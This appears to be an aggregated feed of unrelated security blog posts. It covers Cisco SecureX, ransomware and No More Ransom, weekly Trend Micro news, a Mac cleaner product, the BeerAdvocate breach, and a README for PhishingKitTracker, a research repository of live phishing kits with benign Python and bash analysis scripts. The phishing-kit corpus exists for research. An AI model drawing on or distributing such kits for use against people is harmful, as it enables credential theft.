Due to the breadth of Cisco’s security offerings and our immense volume of customers and partners, Cisco Talos has more visibility into emerging threats than any other security vendor in the world. But the team doesn’t just sit back and wait for intelligence to flow in. Every day, Talos researchers are proactively hunting for vulnerabilities and other issues that could impact global security. And when issues are discovered, coverage is pushed to all of our security products as fast as possible to ensure customers are protected.

If you think about Cisco SecureX as a car, with the various components of our portfolio working together to make it run smoothly, you can view Cisco Talos as the fuel powering the whole vehicle onwards.

What’s new?   

Making threat hunting more accessible

Despite all of the various defenses organizations have in place today to catch threats, some remain hidden and difficult to detect. The practice of threat hunting has emerged to try to combat these more covert security issues. However, threat hunting still remains challenging for many organizations due to a shortage of skilled professionals and advanced tools.

With the launch of SecureX, we unveiled SecureX Threat Hunting, fueled by Cisco Talos. SecureX Threat Hunting assists security teams by helping to uncover hidden threats and providing recommended next steps for further investigation and remediation. Offered as part of our endpoint protection, it allows organizations to take a more proactive approach to security. 

You’ve got (secure) mail

Email remains the number one threat vector for launching cyberattacks on today’s organizations. However, many security solutions are still missing effective email protection. The need for comprehensive email security has risen even further as more companies have transitioned from traditional email systems to cloud-based email solutions such as Office 365, and have found that they lack advanced security with those platforms.

Gartner expects that by 2021, 70% of public and private companies will be using cloud email services. Building off of our proven, multi-layered email security solutions, we’ve recently launched Cisco Cloud Mailbox Defense to address this transition to the cloud.

Cisco Cloud Mailbox Defense is a cloud-native email security platform that provides insight into inbound, outbound, and internal messages, as well as easy attack remediation. Like Cisco SecureX, it is built on the principles of visibility, simplicity, and integration. Being part of a larger security platform further enhances email security by increasing context and enabling a more efficient, coordinated response to email-based attacks.

Helping you embrace the cloud  

The cloud is being widely adopted not just for email, but for many other technologies – especially as employees work from home and demand more flexible, convenient access to business applications. We want to make sure that customers can embrace the many benefits of the cloud while still keeping their assets and data secure.

That is why we’ve collaborated with Amazon Web Services (AWS) to develop solutions that help Cisco customers accelerate their adoption of AWS cloud services, while maintaining a consistent security posture across their environment – from on-prem to cloud. We want to ensure that key security concepts including visibility, segmentation, threat protection, and identity and access management are carried over as customers transition to AWS.

At the end of the day, Cisco SecureX is not just about us. It’s not just about making our own products work with one another. We want them to work with your other technologies as well – from security products to major infrastructure – so you can have all hands on deck when it comes to protecting your organization.

Protecting what’s now and what’s next

According to ESG, “Enterprise-class cybersecurity technology vendors can do a lot of the grunt work by tightly integrating their best-of-breed products into scalable and interoperable technology architectures.” That is our goal with Cisco SecureX. The solutions highlighted above represent just a few examples of how we’re helping customers secure what’s now and what’s next – by pairing long-time, industry-leading technologies with new, innovative solutions.

Whether you’re new to Cisco Secure, or you already use many of our technologies, you can begin benefiting from the integration and automation delivered by Cisco SecureX today. Get started now.


The post Cisco SecureX – What’s driving our platform? appeared first on Cisco Blogs.

Ransomware is Still a Blight on Business


Trends come and go with alarming regularity in cybersecurity. Yet a persistent menace over the past few years has been ransomware. Now mainly targeting organizations rather than consumers, and with increasingly sophisticated tools and tactics at their disposal, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. That’s why we need industry partnerships like No More Ransom.

Celebrating its fourth anniversary this week, the initiative has helped over four million victims fight the scourge of ransomware, saving hundreds of millions of dollars in the process. At Trend Micro, we’re proud to have played a major part, helping to decrypt over 77 million files for victims.

Not going anywhere

Ransomware has been with us for years, but only really hit the mainstream after the global WannaCry and NotPetya incidents of 2017. Unfortunately, that was just the start. Today, no sector is safe. We saw attacks rage across US municipalities, school districts and hospitals in 2019. Most recently, a major outage at a connected technology giant impacted everything from consumer fitness trackers to on-board flight systems.

Such attacks can hit victim organizations hard. There are serious reputational and financial repercussions from major service outages, and the stakes have been raised even further as attackers now often steal data before encrypting victims’ files. A recent incident at a US cloud computing provider has led to data compromise at over 20 universities and charities in the UK and North America, for example. A separate ransomware attack on a managed service provider earlier this year may cost it up to $70m.

The bad guys have shown no sign of slowing down during the pandemic — quite the reverse. Even as hospitals have been fighting to save the lives of COVID-19 patients, they’ve been targeted by ransomware designed to lock mission-critical systems.

No More Ransom

That’s why we need to celebrate public-private partnerships like No More Ransom, which provides helpful advice for victims and a free decryption tool repository. Over the past four years it has helped 4.2 million visitors from 188 countries, preventing an estimated $632 million in ransom demands from finding its way into the pockets of cyber-criminals.

At Trend Micro, we’re proud to have been an associate partner from the very start, contributing our own decryption tools to the scores available today to unlock 140 separate ransomware types. Since the start of No More Ransom, Trend Micro tools have been downloaded nearly half a million times, helping over 50,000 victims globally to decrypt more than 77 million files. We simply can’t put a price on this kind of intervention. 

Yet while the initiative is a vital response to the continued threat posed by ransomware, it is not all we can do. To truly beat this menace, we need to educate organizations all over the planet to improve their resilience to such malware threats. That means taking simple steps such as:

  • Backing up regularly, following the 3-2-1 best-practice policy
  • Installing effective AV from a trusted vendor, featuring behavior monitoring, app whitelisting and web reputation
  • Training staff how to better spot phishing attacks
  • Ensuring software and systems are always on the latest version
  • Protecting the enterprise across endpoint, hybrid cloud, network and email/web gateways

I’m also speaking on a panel today hosted by the U.S. Chamber of Commerce on NotPetya and general ransomware attack trends related to the pandemic. Join us to learn more about ransomware from law enforcement agencies, policy makers and businesses.

If your organization has been impacted by ransomware, check the resources available on the No More Ransom site for advice and access to the free decryption tool repository.


This Week in Security News: Trend Micro Research Uncovers the Business Infrastructure of Cybercrime and Apple Launches Security Device Research Program

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read new insights from Trend Micro that look at the market for underground hosting services and where cybercriminals rent the infrastructure for their business. Also, learn about Apple’s new iPhone Research Device Program that will provide certain hackers with special devices to conduct security research.

Read on:

Trend Micro Research Uncovers the Business Infrastructure of Cybercrime

This week Trend Micro released new insights analyzing the market for underground hosting services and detailing how and where cybercriminals rent the infrastructure that hosts their business. This first report of a planned three-part series details the market for buying and selling these services, which are the backbone of every other aspect of the cybercriminal business model, whether that includes sending spam, communicating with a command and control server, or offering a help desk for ransomware.

Have You Considered your Organization’s Technical Debt?

In the tech world, where one seemingly tiny vulnerability can bring down your whole system, managing technical debt is critical. Fixing issues before they become emergencies is necessary in order to succeed. By spending a little time each day tidying up a few things, you can make your system more stable and provide a better experience for both your customers and your fellow developers.

New ‘Shadow Attack’ Can Replace Content in Digitally Signed PDF Files

Fifteen out of 28 desktop PDF viewer applications are vulnerable to a new attack that lets malicious threat actors modify the content of digitally signed PDF documents. The list of vulnerable applications includes Adobe Acrobat Pro, Adobe Acrobat Reader, Perfect PDF, Foxit Reader, PDFelement, and others, according to new research published this week by academics from the Ruhr-University Bochum in Germany.

Cleaner One Pro Speeds Up Your Mac: Part 2

In the first part of this blog series, Trend Micro introduced its Cleaner One Pro, a one-stop shop to help you speed up your Mac, highlighting the quick optimizer, the main console, and the cleaning tools. In part two, Trend Micro resumes the discussion of how to make your Mac run faster with more Cleaner One Pro features: system and application management, privacy protection and other options.

Multi-Platform Malware Framework Linked to North Korean Hackers

Security researchers at Kaspersky have identified a multi-platform malware framework that they believe North Korea-linked hackers have been leveraging in attacks over the past couple of years. Called MATA, the platform appears to have been in use since spring 2018 to target computers running Windows, Linux, and macOS. The framework, which consists of components such as a loader, an orchestrator, and plugins, is believed to be linked to the prolific North Korean hacking group Lazarus.

Updates on ThiefQuest, the Quickly-Evolving macOS Malware

In early July, Trend Micro noticed a new malware dubbed ThiefQuest, a threat that targets macOS devices, encrypts files, and installs keyloggers on affected systems. However, new reports on the malware suggest that its ransomware activity is not its main attack method; rather, it is a pre-emptive move to disguise its other capabilities such as file exfiltration, command and control (C&C) communication, and keylogging.

Apple’s Long-Awaited Security Device Research Program Makes its Debut

In order to make it easier for security researchers to find vulnerabilities in iPhones, Apple is launching an iPhone Research Device Program that will provide certain hackers with special devices to conduct security research. Beyond enhancing security for iOS users and making it easier to unearth flaws in iPhones, the program also aims to improve the efficiency of ongoing security research on iOS.

Guidelines Related to Security in Smart Factories Part 5: CIS Controls

The purpose of this blog series is to explain typical examples of general-purpose guidelines for ICS and OT security and understand the concepts required for security in smart factories. As a subset of NIST SP800-53 which was introduced in part four, part five explains the CIS Controls that correspond to practical guides.

US Charges Two Chinese Spies for a Global Hacking Campaign that Targeted COVID-19 Research

U.S. prosecutors have charged two Chinese nationals, said to be working for China’s state intelligence bureau, for their alleged involvement in a massive global hacking operation that targeted hundreds of companies and governments for more than a decade. The 11-count indictment, unsealed Tuesday, alleges Li Xiaoyu, 34, and Dong Jiazhi, 33, stole terabytes of data from high-technology companies around the world—including the United States.

Twitter Hacked in Bitcoin Scam

Are Apple, Elon Musk, Barack Obama, Uber, Joe Biden, and a host of others participating in a very transparent bitcoin scheme? No. The question was whether individual accounts were compromised or if something deeper was going on. Underlying this whole situation is a more challenging issue: the level of access that support staff have to any given system.

What are your thoughts on Apple’s new iPhone Research Device program? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Cleaner One Pro Speeds Up Your Mac: Part 2

In Part 1 of this blog, we introduced Trend Micro Cleaner One Pro, a one-stop shop to help you speed up your Mac, highlighting the Quick Optimizer, the Main Console, and the Cleaning Tools. In Part 2, we resume the discussion of how to make your Mac run faster with the remaining Cleaner One Pro features: System and Application Management, Privacy Protection, and Other Options.

System and Application Management

Startup Manager

Your Mac may get sluggish after a year or two of usage and you may find that booting up takes a lot longer. Doing a Startup Manager scan can help you reduce slowdown due to unwanted startup programs and services, to help your Mac boot faster.

Upon completing the scan, Startup Manager will identify apps under two categories: Login Items and Launch Agents.

Login Items are apps that run automatically upon login. You can manage these apps by enabling them to run automatically or disabling them to make your Mac more efficient. If you don’t need autorun, you can remove the apps from the list.

Launch Agents are background services that run automatically on System startup for the extension features of apps. You can manage these services by letting them run automatically or by disabling them to make your Mac boot faster. Similarly, you can remove these agents if you don’t need them or they’re broken.


App Manager

When a user installs an app that doesn’t meet their expectations, they’ll never use it again. In many cases, they remove the app by simply dragging it into the trash, assuming the action completely removes the app, but this is not always true. When you uninstall an app, there are often associated files left on your Mac, even after you have emptied the Trash. They’re known as leftovers.

Leftovers are an app’s associated files and folders that can include different languages, log files, agents, or processes that might try to start an application. App Manager aims to resolve this and helps you clean up your Mac by completely removing app leftovers. App Manager detects all app leftovers automatically so you can remove them with just one click.


Privacy Protection

File Shredder

Data security and privacy are especially important, and managing them applies to anyone collecting and keeping data. Data that has reached its retention limit needs to be permanently removed from your file system, and to be sure it can’t be recovered you need to overwrite the file with random binary data multiple times. This process is often referred to as shredding. With File Shredder, you can remove sensitive files from your hard disk without worrying that they can be recovered.


Other Options


Preferences allows you to manage how the Cleaner One Pro app performs. In Preferences, you’ll see General, Notifications, Memory, Duplicates, Whitelists and Auto Select.

On the General tab, you can choose Auto start at login and other options according to how you would like Cleaner One Pro to behave during startup.


On the Notifications tab, you can disable the notification about smart memory optimization.


Cleaner One Pro is also equipped with a Smart Memory Optimization feature on the Memory tab. This feature uses artificial intelligence. You can set auto clean when your available memory is low or when an app is closed.


The Duplicates, Whitelists and Auto Select tabs work when you use the Duplicate Files feature on the main console. When there are too many duplicate files on your Mac, you can set the rules on the minimum file size, as well as which files to exempt or prioritize during deletion.


Air Support One

If you need technical assistance about Cleaner One Pro, click the robot icon either in the Apple Menu window or on the Main Console.

A chat support person will attend to your concerns or suggestions when using Cleaner One Pro. In case there is no available support engineer, you can send an email by clicking Send Email. Make sure to provide the correct email address.

More Tools

Aside from Cleaner One Pro for Mac, we offer Antivirus One for Mac—as well as Cleaner One for iPhone, which you can download by scanning the QR Code. You can also submit your ideas for Other Tools by clicking the panel.


An Optimized Mac

As you use your Mac over time, you need to maintain it to keep it running smoothly. Trend Micro Cleaner One Pro can clean up your disk space, help boost performance, and solve other Mac issues you might encounter during your daily work. As you consider it for your Mac, you may have remaining questions:

What’s the difference between the Free version and the Paid version? The Free version of Cleaner One Pro includes the Memory Optimizer, basic CPU and Network Monitoring, a Junk Files Cleaner, a Big Files Scanner, a Disk Map, and the Startup Manager. The Paid upgrade of Cleaner One Pro unlocks more features, including more Advanced CPU/Network Monitoring, a Duplicate Finder, a Similar Photos Scanner, an App Manager, and a File Shredder.

Is it safe to use Cleaner One Pro? Cleaner One Pro is notarized by Apple, which assures its users both security and privacy.

How can I download Cleaner One Pro? Cleaner One Pro is distributed via the official Trend Micro website and other authorized channels. Note that Cleaner One Pro is also available for Windows. To make it easy for the readers of this blog series, we’ve provided the download links here: Download Windows Version

Go to Cleaner One Windows or to Cleaner One Mac for more information or to purchase the apps.


How BeerAdvocate Learned They’d Been Pwned


I love beer. This comes as no surprise to regular followers, nor should it come as a surprise that I maintain an Untappd account, logging my beer experiences as I (used to 😢) travel around the world partaking in local beverages. When I received an email from someone over that way who happened to be a happy Have I Been Pwned (HIBP) user and wanted some cyber-assistance, I was intrigued. You'll never believe what happened next...

The tl;dr is that someone with a BeerAdvocate account was convinced the service had been pwned as they'd seen evidence of an email address and password they'd used on the service being abused. They reached out to my guy (we'll call him that for the sake of brevity) who then reached out to me. The relevance to Untappd is that they both share the same parent company (Next Glass) which picked up BeerAdvocate earlier this year and inevitably, they also now share some of their human resources.

Peeling back the layers a bit more, it's interesting to understand what the indicator of compromise was that alerted the (unhappy) BeerAdvocate user in the first place. With the caveat that I have nothing but circumstantial evidence to tie this person to the one who reached out to Next Glass, there's a thread on Reddit that aligns very closely to the facts of the matter:

In February 2020, I received an email from Netflix that I had signed up for an account. This was to an email address that is completely unique to beeradvocate (as is the custom I do with many sites I sign up for). Someone had registered a new Netflix account with my email / password associated with my BeerAdvocate account. This email address & password combination has existed only in two places: my memory and beeradvocate's database. Not even a password manager.

My going in position when contacted was that this would be yet another case of someone unfairly misattributing a breach to an organisation based purely on what they believe to be a unique email address or password being used in a way they didn't expect. I see this all the time and I literally have a blog post in progress titled "Has a Site Been Breached Because I Received an Email to an Address Unique to Them?" It details many different reasons for this behaviour that are entirely unrelated to a breach and in my experience, there is almost always a non-breach explanation. But not this time.

Plugging the email address in question into HIBP resulted in only a single hit:

[Screenshot]

Unverified breaches are incidents where the data is legitimate (for example, people's real email addresses and passwords), but I haven't been able to confirm the legitimacy of the source. Per the description in the breach above, that incident definitely had data that could be traced back to both Coupon Mom and Armor Games, but what else might be in there? I pulled out the original breach and searched for "beeradvocate". 816 rows came back:

[Screenshot]

Well that's... damning. You simply don't have that many matches without there being a very high likelihood BeerAdvocate had suffered a data breach. For every one instance of an email address or password with the string "beeradvocate" in it there'll be another 100 instances that still came from their service but didn't use a customised email alias or (let's face it) very poorly chosen password. On the balance of evidence, they had indeed been breached and their data rolled in with at least the two other organisations into what was now effectively a credential stuffing list.

On Friday, BeerAdvocate / Next Glass contacted impacted customers and published a public disclosure notice:

After a thorough investigation from an independent third party cyber security firm, it was confirmed that BeerAdvocate user login credentials (email address, BeerAdvocate forum password) were lost and aggregated along with breaches of other websites into a breach dataset that became known as CouponMom 2014.

I'd argue that they're not lost, instead there's actually a lot of backups of them! They dated the breach back to "seven or eight years ago" and stated that "a since-retired password hashing method allowed some passwords to be derived". They don't state which algorithm was used, but it's a safe bet it was MD5 or SHA-1 which was already pretty fundamentally flawed by that time. I personally would have approached a number of things around this incident differently, but Next Glass still deserves some kudos for taking the concerns of the individual who raised this seriously and seeing it through to its conclusion, especially given they inherited this breach by virtue of the BeerAdvocate acquisition.

Just one more thing - I've often been asked why I don't discard the source data of a breach once processed and email addresses loaded into HIBP. Putting aside the fact that discarding it doesn't actually make it go away (a quick search found this data still being extensively traded), historical breaches can be enormously useful in establishing the origin of subsequent breaches. This incident exemplifies that and without ready access to this data I don't know that BeerAdvocate would have established the breach, notified their customers and given them the opportunity to go and change that same one password they use across all their other accounts...

Cheers! 🍺

This Week in Security News: Trend Micro Research Discovers Cybercriminal Turf War on Routers and a Massive Twitter Breach Compromises Some of the World’s Most Prominent Accounts

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about Trend Micro’s report on the botnet battle for IoT territory and how attacker groups are trying to gain control of vulnerable routers and other devices. Also, learn about a Twitter breach that happened earlier this week, involving some of the most well-known and wealthiest people and brands globally.

Read on:

‘DDoS-For-Hire’ is Fueling a New Wave of Attacks

Earlier this week, Trend Micro released a report about escalating global turf wars between attacker groups vying to seize control of vulnerable routers and other devices, titled “Worm War: The Botnet Battle for IoT Territory.” Robert McArdle, director of Trend Micro’s forward-looking threat research (FTR), and David Sancho, senior threat researcher, spoke with WIRED about findings from the report and how the aim of attacker groups is to power botnets that can direct a firehose of malign traffic or requests for DDoS attacks.

Extraordinary Twitter Hack Compromises Some of the World’s Most Prominent Accounts

Earlier this week, hackers hijacked the Twitter accounts of some of the world’s most prominent and wealthiest people and brands including Barack Obama, Joe Biden, Kanye West, Jeff Bezos, Bill Gates, Elon Musk and tech giant Apple. These hacked accounts sent out messages promising bitcoin payments as part of a scam.

Tax Scams – Everything You Need to Know to Keep Your Money and Data Safe

Cybercriminals are always on the hunt for two things: people’s identity data from their accounts and their money. Both can be exposed during the tax-filing season, and cybercriminals have adapted multiple tools and techniques to obtain this information. In this blog, take a look at some of the main threats during tax-filing season and what you can do to stay safe.

Russia is Trying to Hack and Steal Coronavirus Vaccine Data, U.S., Canadian and UK Officials Claim

Officials said that hackers linked to Russian intelligence services are trying to steal information about coronavirus vaccine research in the U.S., Canada and the U.K. They said that a group known as APT29 — also known as “Cozy Bear” and believed to be associated with Russian intelligence — was likely to blame for the attack, which used spear phishing and custom malware to target vaccine researchers.

Trend Micro and Girls in Tech to Provide Cybersecurity Training to Girls Around the World

Trend Micro recently announced that it is expanding its partnership with non-profit Girls in Tech with a new initiative aimed at closing the gender diversity and talent gap in the technology industry. Together, the organizations will provide cybersecurity training to girls around the world to help develop a large talent pool of women eager to get their start in the industry.

Microsoft Tackles 123 Fixes for July Patch Tuesday

A critical DNS bug and a publicly known elevation-of-privilege flaw top this month’s Patch Tuesday list of 123 fixes. This article includes data from the Trend Micro Zero Day Initiative (ZDI) July Patch Tuesday blog post, which says that this Patch Tuesday “makes five straight months of 110+ CVEs released and brings the total for 2020 up to 742. For comparison, Microsoft released patches for 851 CVEs in all of 2019. At this pace, Microsoft will eclipse that number next month.”

Guidelines Related to Security in Smart Factories (Part 4) NIST SP800 Series

This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Building on the NIST CSF introduced in Part 3, Part 4 explains SP800-53, SP800-82, and SP800-171 from the highly specific SP800 series of guidelines, which are considered particularly relevant to general manufacturing industries.

TikTok’s Huge Data Harvesting Prompts U.S. Security Concerns

Security researchers say TikTok’s information collection practices are consistent with Facebook Inc., Google and other U.S. tech companies looking to tailor ads and services to their users. The bigger issue lies in what TikTok does with the intel it gathers. Some groups like the Democratic and Republican national committees and Wells Fargo & Co. have discouraged or banned people from using the app.

Infrastructure as Code: Security Risks and How to Avoid Them

Infrastructure as Code (IaC) is a key DevOps practice that bolsters agile software development. In this report, Trend Micro identifies security risk areas in IaC implementations and the best practices in securing them.

Lost in Translation: Serious Flaws Found in ICS Protocol Gateways

Marco Balduzzi, senior research scientist with Trend Micro, will disclose details of multiple vulnerabilities he and his team discovered in a sampling study of five popular ICS gateway products at Black Hat USA’s virtual event next month. Their findings focus not on the gateways’ software nor the industrial protocols as in previous research, but rather on a lesser-studied function: the protocol translation process that the devices conduct.

Fixing Cloud Migration: What Goes Wrong and Why?

As part of our #LetsTalkCloud series, Trend Micro is sharing some of its deep, in-house expertise on cloud migration through conversations with company experts and folks from the industry. To kick off the series, this blog covers some of the security challenges that solution architects and security engineers face with customers when discussing cloud migrations. Spoiler: these challenges may not be what you expect.

Has your organization experienced security challenges related to cloud migration? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Introducing PhishingKitTracker

If you are a security researcher, or simply curious about how attackers implement phishing, you will sooner or later find yourself looking for phishing kits. A phishing kit is not a phishing builder but a real implementation (actually a re-implementation) of a third-party website, built to lure the victim. Attackers initially use a phishing builder to “clone” the original website, but then they add interesting add-ons to the freshly regenerated site, for example: evasion techniques (to evade phishing detectors), targeted elements (to tailor the page to the victims), fast redirectors (to follow the attack chain into the original website, or to a relay that tries to infect you) and sometimes exploit kits that try to exploit your browser before letting you go.

Credit: Alen Pavlovic (here)


There are places where you can buy phishing kits (BleepingComputer wrote a great article on that here), but if you want to get them for free in order to study the attack schema and kit composition, you won’t find free collections. So I decided to share my PhishingKit Tracker, updated automatically by my backend engine every day, for study and research purposes.

You can find it HERE (the PhishingKitTracker GitHub repo).


This repository holds a collection of phishing kits used by criminals to steal user information. Almost every file in the raw folder is malicious, so I strongly recommend that you neither open these files nor misuse the code to prank your friends. Playing with these kits may lead to irreversible consequences affecting anything from personal data to passwords and banking information.

I am not responsible for any damage caused by the malware inside my repository or by your negligence in general.

NB: Large File Storage Ahead

PhishingKitTracker is stored using Git Large File Storage (git-lfs) because of the large amount of data tracked. You should install git-lfs before cloning this repository.

RAW Data

The raw folder tracks the phishing kits in their original format; no manipulation is applied to that data. A backend script goes over harvested malicious websites (harvested from common sources) and checks whether phishing kits are present. If a phishing kit is found, the resulting file is downloaded and immediately added to that folder. The folder is tracked with Git Large File Storage since many files are bigger than 100MB. The “RAW Data” is a largely unexplored land; you will very likely find many interesting topics in it. Please remember to cite this work if you find something here, it would be very much appreciated.


The stats folder maintains two up-to-date files:

  1. files_name holds the frequency of the file names found to be associated with kits. In other words, every phishing kit is saved on the phishing host under a name, and files_name keeps track of every such file name and its frequency. If you are wondering why I am not tracking hashes: phishing kits are big compressed archives, so hashing them would make no sense at this stage since they always differ from each other (but check the src folder for additional information).
  2. sites holds the frequency of the hosting domain names, in other words where each phishing kit was found. No duplicates are tracked, meaning that the frequency counts unique file names. So, for example, a count of 3 next to a domain means that three different phishing kits have been found there over time.

Both of these files are generated by simple bash scripts like:

  • ls raw/ | cut -d'_' -f1 | sort | uniq -c | sort -bgr > stats/sites.txt
  • ls raw/ | cut -d'_' -f2 | sort | uniq -c | sort -bgr > stats/files_name.txt

(uniq -c only collapses adjacent duplicates, so the cut field is sorted first; ls output is sorted by the whole name, which is not the same order as the second field.) These scripts run on every commit, keeping the stats files in line with the raw folder.

On the other hand, a file called similarity.csv is provided with a considerable delay, because generating it takes a very long time. That file gives the similarity between the tracked phishing kits. It is a simple CSV file, so you can import it into your favourite spreadsheet and make graphs, compute statistics or manipulate it any way you prefer.


The similarity file has the following structure: FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax where:

  • FileA is the phishing kit considered in that analysis.
  • FileB is the phishing kit compared to FileA.
  • SimilarityAVG is the average similarity, computed by running the similarity check between every (interesting) file in the FileA archive and every (interesting) file in the FileB archive.
  • SimilarityMin is the lowest similarity value found between FileA and FileB.
  • SimilarityMax is the highest similarity value found between FileA and FileB.

If you want to generate similarity.csv on your own, I provide a simple and dirty script in the src folder. So far it has several limitations (for example, it only handles ZIP files). Please make pull requests to improve and empower it. Each contribution would be very helpful.


Please check these variables and change them as you wish.

EXTENSION_FOR_ANALYSIS = ['.html','.js','.vbs','.xls','.xlsm','.doc','.docm', '.ps1']
OUTPUT_FILE = 'similarity.csv'
RAW_FOLDER = '/tmp/raw/'
TEMP_FOLDER = '/tmp/tt'

Once you’ve changed them you can run the script and take a long rest. It will walk through the RAW_FOLDER, grab the .zip files and try to compute code similarity between them. At the very end it will save the results into OUTPUT_FILE. From there you can import that file into your favourite spreadsheet processor and work on the code similarity.

So far the Python script is only able to compare ZIP-packaged tracked phishing kits; support for other compressed formats is still work in progress.

NB: The Python script is at a very early stage of development. Please help to improve it.

How to contribute

Introduce a walking script for different compression formats. In other words, if you want to contribute you can write a new section such as the following one, but for different compression extensions such as .tar.gz, .tar, .rar, .7z and so on.

import os
from zipfile import ZipFile

# Extracts Zip files based on EXTENSION_FOR_ANALYSIS. It returns the entire file
# paths for future work. Files that match an extension but cannot be extracted
# are collected separately in n_interesting_files.
def extractZipAndReturnsIntereistingFiles(file_to_extract):
    interesting_files = []
    n_interesting_files = []
    try:
        with ZipFile(file_to_extract, 'r') as zipObj:
            listOfFileNames = zipObj.namelist()
            for fileName in listOfFileNames:
                for ext in EXTENSION_FOR_ANALYSIS:
                    if fileName.endswith(ext):
                        try:
                            zipObj.extract(fileName, TEMP_FOLDER)
                            interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
                        except Exception as e:
                            # entry could not be extracted (corrupt member, bad path, ...)
                            n_interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
    except Exception as e:
        # not a readable ZIP archive: return whatever was extracted so far
        return interesting_files
    return interesting_files

One more way to contribute is to make the comparison loop smarter and quicker. You might decide to parallelize the task by forking and spawning more processes, or by changing the way I use multi-threading in this quick and dirty statistics script. In conclusion, every working pull request is welcome.
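The tar-archive walker this section asks contributors to write, together with the computation of one FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax row described under similarity.csv above, as an added example that is not code from the Phishing Kits Tracker repository. The difflib-based similarity metric, the helper names, the path-containment check and the constructed sample kits are my assumptions.

```python
# Added example, not code from the Phishing Kits Tracker repository: the tar/.tar.gz
# walker the README asks contributors to write, plus one similarity.csv row
# (FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax). The metric (difflib ratio
# over file bytes), the helper names and the sample kits are assumptions.
import difflib
import io
import os
import tarfile
import tempfile

EXTENSION_FOR_ANALYSIS = ['.html', '.js', '.vbs', '.xls', '.xlsm', '.doc', '.docm', '.ps1']


def _is_safe_member(member, dest):
    # Kits are attacker-authored archives: only extract regular files whose
    # resolved path stays inside dest (no "../" escapes, absolute paths or links).
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, member.name))
    return member.isfile() and os.path.commonpath([root, target]) == root


def extract_tar_and_return_interesting_files(file_to_extract, temp_folder):
    """Same contract as the ZIP walker above, for .tar / .tar.gz / .tar.bz2 / .tar.xz."""
    interesting_files = []
    try:
        with tarfile.open(file_to_extract, 'r:*') as tar:  # 'r:*' autodetects compression
            for member in tar.getmembers():
                if not any(member.name.endswith(ext) for ext in EXTENSION_FOR_ANALYSIS):
                    continue
                if not _is_safe_member(member, temp_folder):
                    continue  # never write outside the temp folder
                tar.extract(member, temp_folder)
                interesting_files.append(os.path.join(temp_folder, member.name))
    except (tarfile.TarError, OSError):
        return interesting_files  # unreadable archive: keep what was extracted so far
    return interesting_files


def file_similarity(path_a, path_b):
    # Ratio in [0, 1]; 1.0 means the two files are byte-identical.
    with open(path_a, 'rb') as fa, open(path_b, 'rb') as fb:
        return difflib.SequenceMatcher(None, fa.read(), fb.read()).ratio()


def similarity_row(kit_a, files_a, kit_b, files_b):
    """One similarity.csv row: every interesting file of A against every one of B."""
    scores = [file_similarity(a, b) for a in files_a for b in files_b]
    if not scores:
        return None
    return (kit_a, kit_b, sum(scores) / len(scores), min(scores), max(scores))


def _write_tar(path, members):
    # Builds a constructed sample archive from a {name: bytes} mapping.
    with tarfile.open(path, 'w:gz') as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return path


def run_demo():
    """Two constructed sample kits (not real ones) in a fresh temp dir; returns the outcome."""
    work = tempfile.mkdtemp(prefix='kit-demo-')
    form = b'<html><form action="post.php">user pass</form></html>'
    kit_a = _write_tar(os.path.join(work, 'kitA.tar.gz'), {
        'index.html': form,
        'obf.js': b'var a=1;function go(){document.forms[0].submit()}',
        'readme.txt': b'not an analysed extension, ignored',
    })
    kit_b = _write_tar(os.path.join(work, 'kitB.tar.gz'), {
        'index.html': form,  # byte-identical to kit A's, so SimilarityMax is 1.0
        'loader.js': b'window.onload=function(){location.href="/next"}',
        '../escape.html': b'<p>must never be written outside the temp folder</p>',
    })
    files_a = extract_tar_and_return_interesting_files(kit_a, os.path.join(work, 'ta'))
    files_b = extract_tar_and_return_interesting_files(kit_b, os.path.join(work, 'tb'))
    return {
        'a': [os.path.basename(p) for p in files_a],  # ['index.html', 'obf.js']
        'b': [os.path.basename(p) for p in files_b],  # ['index.html', 'loader.js']
        'escaped': os.path.exists(os.path.join(work, 'escape.html')),  # False
        'row': similarity_row('kitA.tar.gz', files_a, 'kitB.tar.gz', files_b),
    }
```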

Cite the Phishing Kit

@misc{ MR,
       author = "Marco Ramilli",
       title = "Phishing Kits Tracker",
       year = "2020",
       url = "",
       note = "[Online; July 2020]"
}

Data Breach – Understanding the severity of it

A data breach is a security gap in which information or data is accessed or stolen without authorization. It is a breach of trust between the owner of the data and the party that accesses it without consent. To put it in simpler terms, it is a nonconsensual usage of someone’s…

Poulight- An info-stealing trojan might be teaching you how to play Minecraft

Poulight is an info-stealer trojan which most probably originated in Russia. It is written in .NET and can collect sensitive information and deliver it to cybercriminals. Ever since its first appearance, it has been growing substantially and taking different forms. The main infection vector remains spear-phishing emails. It was…

School from Home: “Square One” Basics

With many schools around the globe postponing classes for long stretches or closing school outright for the rest of the academic year, the challenge of parenting just cranked up. After all, there’s no more schoolhouse—it’s your house. Whether you’re the parent of a kindergartener or a high school senior, or have a mix of children in between, there’s a good chance you’re trying to figure out how to continue learning online at home—while also dealing with the disappointments of missing friends, activities, and major events like sports, proms, and even graduations. It’s not easy, and without a doubt this is new to all of us.

We want to make it easier for you, even if it’s in some small ways. We started by asking you what roadblocks are getting in the way. This April, we reached out to parents across the U.S. and asked what was getting in the way. Your top two answers came across loud and clear: you’re struggling with establishing a routine and keeping children focused.

Looking for resources and ideas for bringing a little structure into online learning at home and how that fits into your day? We have you covered, so let’s start at square one—making sure that your online learning environment at home is secure.

Start with a look at your devices

First, determine which device your child is going to use. Some school districts provide students with a laptop that the students keep for the school year. The security on these devices will more than likely be managed centrally by the school district. Thus, they’ll have their own security software and settings already in place. Moreover, such a centrally managed device will likely be limited in terms of which settings can be updated and what software can be added. If your child has a school-issued device, follow the advice of the school and its IT admin on matters of security tools and software. And if you have questions about security, reach out to them.

